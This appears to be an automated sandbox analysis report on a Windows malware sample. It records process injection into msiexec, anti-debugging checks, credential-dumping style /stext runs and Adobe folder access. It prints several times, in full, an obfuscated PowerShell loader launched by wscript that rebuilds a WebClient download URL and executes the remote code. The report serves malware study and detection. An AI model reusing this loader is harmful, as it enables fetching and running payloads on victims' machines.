              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle,9_2_0040DD85
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4901Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4932Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 9175Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 557Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeAPI coverage: 8.9 %
              Source: C:\Windows\SysWOW64\msiexec.exeAPI coverage: 8.3 %
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6696Thread sleep time: -1844674407370954s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2956Thread sleep time: -4611686018427385s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 2300Thread sleep count: 180 > 30Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 2300Thread sleep time: -540000s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 2300Thread sleep count: 9807 > 30Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 2300Thread sleep time: -29421000s >= -30000sJump to behavior
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_02A810F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,7_2_02A810F1
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_02A86580 FindFirstFileExA,7_2_02A86580
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_0040AE51 FindFirstFileW,FindNextFileW,9_2_0040AE51
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen,10_2_00407EF8
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen,11_2_00407898
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00418981 memset,GetSystemInfo,9_2_00418981
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Adobe\Acrobat\Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\Cache\Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Adobe\Jump to behavior
              Source: msiexec.exe, 00000007.00000002.3434646364.00000000083FA000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000002.3434646364.0000000008454000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: powershell.exe, 00000002.00000002.2302146865.0000020CF4170000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
              Source: C:\Windows\SysWOW64\msiexec.exeAPI call chain: ExitProcess graph end nodegraph_10-34015
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess queried: DebugPortJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_047FD244 LdrInitializeThunk,LdrInitializeThunk,4_2_047FD244
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_02A82639 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,7_2_02A82639
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle,9_2_0040DD85
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_004044A4 LoadLibraryW,GetProcAddress,FreeLibrary,MessageBoxW,9_2_004044A4
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_02A84AB4 mov eax, dword ptr fs:[00000030h]7_2_02A84AB4
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_02A8724E GetProcessHeap,7_2_02A8724E
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_02A82639 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,7_2_02A82639
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_02A82B1C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,7_2_02A82B1C
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_02A860E2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,7_2_02A860E2

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created / APC Queued / Resumed: C:\Windows\SysWOW64\msiexec.exeJump to behavior
              Source: Yara matchFile source: amsi64_1076.amsi.csv, type: OTHER
              Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 1076, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 6592, type: MEMORYSTR
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: NULL target: C:\Windows\SysWOW64\msiexec.exe protection: execute and read and writeJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: NULL target: C:\Windows\SysWOW64\msiexec.exe protection: execute and read and writeJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: NULL target: C:\Windows\SysWOW64\msiexec.exe protection: execute and read and writeJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread APC queued: target process: C:\Windows\SysWOW64\msiexec.exeJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\SysWOW64\msiexec.exe base: 3D30000Jump to behavior
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "echo $Alimentation; function Chirked($Hajji){$Forsorgslederne=4;$Xenos=$Forsorgslederne;do{$Lreanstalterne+=$Hajji[$Xenos];$Xenos+=5} until(!$Hajji[$Xenos])$Lreanstalterne}function Hypohyaline($banestrkning){ .($Elektriciteten) ($banestrkning)}$Crassitude=Chirked 'Bes nBoreE NeiTBipa.overW';$Crassitude+=Chirked 'Hob E ptobUnfeCfraglAl tiTeksEReban StjT';$Ruineringer=Chirked 'OplbMS inoBrynz utiambylforsl Pepa U i/';$Tikampens=Chirked 'B edTDuntlC tasNeop1 For2';$Trappeopgangen='Jan,[ NonNRa heAgriT Iag.PoetSsil e Ra RPre vNu.kIPredC ncoE ympMakrOVet,IFremNConttDobbMOve AHykenHem.aHe,sgGarre.itrrrefl] ase: Dra:SgdcS Feie UdtcSnabUKantrSgepiCapeTReenyRagopAl erInflo AksT UnboTinaCurfuoStanLSamv=Ernr$ScratHousIfarvkTipbAAffaMEurop S.keHngsnUdarS';$Ruineringer+=Chirked 'Over5Crul.Cell0 Ans P yc(C.xcW illi RepnIndidLakkoMasowTilrs rog MangN,aveT Kon Hemo1B oc0chir.Blat0 Sla;Strk isWAfkliUdt nSinu6Bomb4Vent;,obb Poinx il6Un r4 Tem;Jupe ForrEpopvTour:Tele1Mo,s3Trep1pil .Carb0 Liv)U.pr WallGUnsceParic SkukNonvoChem/Sauc2 Uci0Vrdi1Tand0Bro 0Kary1yngl0Pupp1Res TagsFIns iMat r IrieSubsffirmo nonxHvid/Exem1 rk3fodm1L,ge. O e0';$morgentaage=Chirked ' biluHypoSSproeTraeRGinh-Un ea DelgPreleAlr n Arbt';$Snyd=Chirked ' anehHjultA,ietAparpJacksudsl: rog/ Ops/GenbfSpidoPr,m2KiskxSammcSvig.Hin ichi cJvnguMa i/NonsyWismA,usivSupeXHin.CmonorFairQsnveD G u/ AtoMT areglyks Ya.tFingrresueCoaln TwidMesaeItab.Wunnt OveoTutsc';$Messieurs=Chirked 'Diss>';$Elektriciteten=Chirked 'DikiISanseFarbX';$Fungeres='Overfrsels';$Teleteknikken='\Mikadoerne124.Sty';Hypohyaline (Chirked ' urt$Dag,gSeisl.audo CosB R taAeroL.isa:Tm eIImprN O,etJag Uv ntidecoTProgI La O DirNA,greProdR ov.NSy eeInfosOct =Offc$ fskeSidenMin V pro:Fir.A Prep ForPS gidVa.saTalltDagnAment+Am,z$TindT HalEArmbLJeweELderTf,eee nankfysin ignITavikAd bKF geeKe ln');Hypohyaline (Chirked ' u s$ Ustg amblOceao.rilbPlanAsnowl C e:Che tPervHTappIUl mCEx,oK KreS ParEHetetR mm=Suff$Ly tsC cknS,miYMotodAnsv.BeamsLichp VanLMoniiNonrT A,a(Relo$ Hy,M RefERiskSAnakS Fa INaboEDuodUBe.eR Ma.sUlyk)');Hypohyaline (Chirked $Trappeopgangen);$Snyd=$thickset[0];$Antenners192=(Chirked 'P ys$ScugGKopulSt,gO BriBLaveaSuchlWilt:HvidnP ilOContNMellpUndeeOmherOraoc Je E.argPSensTMariIP isvHy.deK mpn ygESvens KlusProa= unNRickEFidiWAdsk-Fa kO SloBToppJPusleVgeaCAntitfor SikkSTrimYKerasSemitAcquEBr.mm Sha.Kart$ResucReoxRAareaGillsFadmsFil IMo.sT TauUU dgdTn,ee');Hypohyaline ($Antenners192);Hypohyaline (Chirked 'Halv$SerpN EyeoBimmn uttpS kkeChu rSkracMetaeFla,pInastBespi UnavB cye krnUkrneMachs rolsSemi.DrysHAntie K.eaHydrdMo.oe SalrF.easVi d[Aest$ TopmIncro Vi r LingSoeneperln,nsvtLandaMoseaThergGemoeG,mb] Reg= Sc.$ iddREddiu S aiAfgrnMisre PrerSamti GynnDepogFiskeSvalr');$Honorifical179=Chirked 'Clav$UnocN CuloRe in.vidpS.ape U sr CoucCalyeOddspPorctHydriHandvTilpeKompnIdoteret sKerssIvor.St rD Diso nsw ign Fo Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\fxqlydinmzxw"Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\prvvzwtgahpigxth"Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\ztjoaodiophnilhlqlz"Jump to behavior
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "echo $alimentation; function chirked($hajji){$forsorgslederne=4;$xenos=$forsorgslederne;do{$lreanstalterne+=$hajji[$xenos];$xenos+=5} until(!$hajji[$xenos])$lreanstalterne}function hypohyaline($banestrkning){ .($elektriciteten) ($banestrkning)}$crassitude=chirked 'bes nboree neitbipa.overw';$crassitude+=chirked 'hob e ptobunfecfraglal titeksereban stjt';$ruineringer=chirked 'oplbms inobrynz utiambylforsl pepa u i/';$tikampens=chirked 'b edtduntlc tasneop1 for2';$trappeopgangen='jan,[ nonnra heagrit iag.poetssil e ra rpre vnu.kipredc ncoe ympmakrovet,ifremnconttdobbmove ahykenhem.ahe,sggarre.itrrrefl] ase: dra:sgdcs feie udtcsnabukantrsgepicapetreenyragopal erinflo akst unbotinacurfuostanlsamv=ernr$scrathousifarvktipbaaffameurop s.kehngsnudars';$ruineringer+=chirked 'over5crul.cell0 ans p yc(c.xcw illi repnindidlakkomasowtilrs rog mangn,avet kon hemo1b oc0chir.blat0 sla;strk iswafkliudt nsinu6bomb4vent;,obb poinx il6un r4 tem;jupe forrepopvtour:tele1mo,s3trep1pil .carb0 liv)u.pr wallgunsceparic skuknonvochem/sauc2 uci0vrdi1tand0bro 0kary1yngl0pupp1res tagsfins imat r iriesubsffirmo nonxhvid/exem1 rk3fodm1l,ge. o e0';$morgentaage=chirked ' biluhypossproetraerginh-un ea delgprelealr n arbt';$snyd=chirked ' anehhjulta,ietaparpjacksudsl: rog/ ops/genbfspidopr,m2kiskxsammcsvig.hin ichi cjvnguma i/nonsywisma,usivsupexhin.cmonorfairqsnved g u/ atomt areglyks ya.tfingrresuecoaln twidmesaeitab.wunnt oveotutsc';$messieurs=chirked 'diss>';$elektriciteten=chirked 'dikiisansefarbx';$fungeres='overfrsels';$teleteknikken='\mikadoerne124.sty';hypohyaline (chirked ' urt$dag,gseisl.audo cosb r taaerol.isa:tm eiimprn o,etjag uv ntidecotprogi la o dirna,greprodr ov.nsy eeinfosoct =offc$ fskesidenmin v pro:fir.a prep forps gidva.satalltdagnament+am,z$tindt halearmbljeweeldertf,eee nankfysin ignitavikad bkf geeke ln');hypohyaline (chirked ' u s$ ustg ambloceao.rilbplanasnowl c e:che tpervhtappiul mcex,ok kres parehetetr mm=suff$ly tsc ckns,miymotodansv.beamslichp vanlmoniinonrt a,a(relo$ hy,m referisksanaks fa inaboeduodube.er ma.sulyk)');hypohyaline (chirked $trappeopgangen);$snyd=$thickset[0];$antenners192=(chirked 'p ys$scuggkopulst,go briblaveasuchlwilt:hvidnp ilocontnmellpundeeomheroraoc je e.argpsenstmariip isvhy.dek mpn ygesvens klusproa= unnrickefidiwadsk-fa ko slobtoppjpuslevgeacantitfor sikkstrimykerassemitacquebr.mm sha.kart$resucreoxraareagillsfadmsfil imo.st tauuu dgdtn,ee');hypohyaline ($antenners192);hypohyaline (chirked 'halv$serpn eyeobimmn uttps kkechu rskracmetaefla,pinastbespi unavb cye krnukrnemachs rolssemi.dryshantie k.eahydrdmo.oe salrf.easvi d[aest$ topmincro vi r lingsoeneperln,nsvtlandamoseatherggemoeg,mb] reg= sc.$ iddreddiu s aiafgrnmisre prersamti gynndepogfiskesvalr');$honorifical179=chirked 'clav$unocn culore in.vidps.ape u sr couccalyeoddspporcthydrihandvtilpekompnidoteret skerssivor.st rd diso nsw ign fo
              Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" "echo $alimentation; function chirked($hajji){$forsorgslederne=4;$xenos=$forsorgslederne;do{$lreanstalterne+=$hajji[$xenos];$xenos+=5} until(!$hajji[$xenos])$lreanstalterne}function hypohyaline($banestrkning){ .($elektriciteten) ($banestrkning)}$crassitude=chirked 'bes nboree neitbipa.overw';$crassitude+=chirked 'hob e ptobunfecfraglal titeksereban stjt';$ruineringer=chirked 'oplbms inobrynz utiambylforsl pepa u i/';$tikampens=chirked 'b edtduntlc tasneop1 for2';$trappeopgangen='jan,[ nonnra heagrit iag.poetssil e ra rpre vnu.kipredc ncoe ympmakrovet,ifremnconttdobbmove ahykenhem.ahe,sggarre.itrrrefl] ase: dra:sgdcs feie udtcsnabukantrsgepicapetreenyragopal erinflo akst unbotinacurfuostanlsamv=ernr$scrathousifarvktipbaaffameurop s.kehngsnudars';$ruineringer+=chirked 'over5crul.cell0 ans p yc(c.xcw illi repnindidlakkomasowtilrs rog mangn,avet kon hemo1b oc0chir.blat0 sla;strk iswafkliudt nsinu6bomb4vent;,obb poinx il6un r4 tem;jupe forrepopvtour:tele1mo,s3trep1pil .carb0 liv)u.pr wallgunsceparic skuknonvochem/sauc2 uci0vrdi1tand0bro 0kary1yngl0pupp1res tagsfins imat r iriesubsffirmo nonxhvid/exem1 rk3fodm1l,ge. o e0';$morgentaage=chirked ' biluhypossproetraerginh-un ea delgprelealr n arbt';$snyd=chirked ' anehhjulta,ietaparpjacksudsl: rog/ ops/genbfspidopr,m2kiskxsammcsvig.hin ichi cjvnguma i/nonsywisma,usivsupexhin.cmonorfairqsnved g u/ atomt areglyks ya.tfingrresuecoaln twidmesaeitab.wunnt oveotutsc';$messieurs=chirked 'diss>';$elektriciteten=chirked 'dikiisansefarbx';$fungeres='overfrsels';$teleteknikken='\mikadoerne124.sty';hypohyaline (chirked ' urt$dag,gseisl.audo cosb r taaerol.isa:tm eiimprn o,etjag uv ntidecotprogi la o dirna,greprodr ov.nsy eeinfosoct =offc$ fskesidenmin v pro:fir.a prep forps gidva.satalltdagnament+am,z$tindt halearmbljeweeldertf,eee nankfysin ignitavikad bkf geeke ln');hypohyaline (chirked ' u s$ ustg ambloceao.rilbplanasnowl c e:che tpervhtappiul mcex,ok kres parehetetr mm=suff$ly tsc ckns,miymotodansv.beamslichp vanlmoniinonrt a,a(relo$ hy,m referisksanaks fa inaboeduodube.er ma.sulyk)');hypohyaline (chirked $trappeopgangen);$snyd=$thickset[0];$antenners192=(chirked 'p ys$scuggkopulst,go briblaveasuchlwilt:hvidnp ilocontnmellpundeeomheroraoc je e.argpsenstmariip isvhy.dek mpn ygesvens klusproa= unnrickefidiwadsk-fa ko slobtoppjpuslevgeacantitfor sikkstrimykerassemitacquebr.mm sha.kart$resucreoxraareagillsfadmsfil imo.st tauuu dgdtn,ee');hypohyaline ($antenners192);hypohyaline (chirked 'halv$serpn eyeobimmn uttps kkechu rskracmetaefla,pinastbespi unavb cye krnukrnemachs rolssemi.dryshantie k.eahydrdmo.oe salrf.easvi d[aest$ topmincro vi r lingsoeneperln,nsvtlandamoseatherggemoeg,mb] reg= sc.$ iddreddiu s aiafgrnmisre prersamti gynndepogfiskesvalr');$honorifical179=chirked 'clav$unocn culore in.vidps.ape u sr couccalyeoddspporcthydrihandvtilpekompnidoteret skerssivor.st rd diso nsw ign fo
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "echo $alimentation; function chirked($hajji){$forsorgslederne=4;$xenos=$forsorgslederne;do{$lreanstalterne+=$hajji[$xenos];$xenos+=5} until(!$hajji[$xenos])$lreanstalterne}function hypohyaline($banestrkning){ .($elektriciteten) ($banestrkning)}$crassitude=chirked 'bes nboree neitbipa.overw';$crassitude+=chirked 'hob e ptobunfecfraglal titeksereban stjt';$ruineringer=chirked 'oplbms inobrynz utiambylforsl pepa u i/';$tikampens=chirked 'b edtduntlc tasneop1 for2';$trappeopgangen='jan,[ nonnra heagrit iag.poetssil e ra rpre vnu.kipredc ncoe ympmakrovet,ifremnconttdobbmove ahykenhem.ahe,sggarre.itrrrefl] ase: dra:sgdcs feie udtcsnabukantrsgepicapetreenyragopal erinflo akst unbotinacurfuostanlsamv=ernr$scrathousifarvktipbaaffameurop s.kehngsnudars';$ruineringer+=chirked 'over5crul.cell0 ans p yc(c.xcw illi repnindidlakkomasowtilrs rog 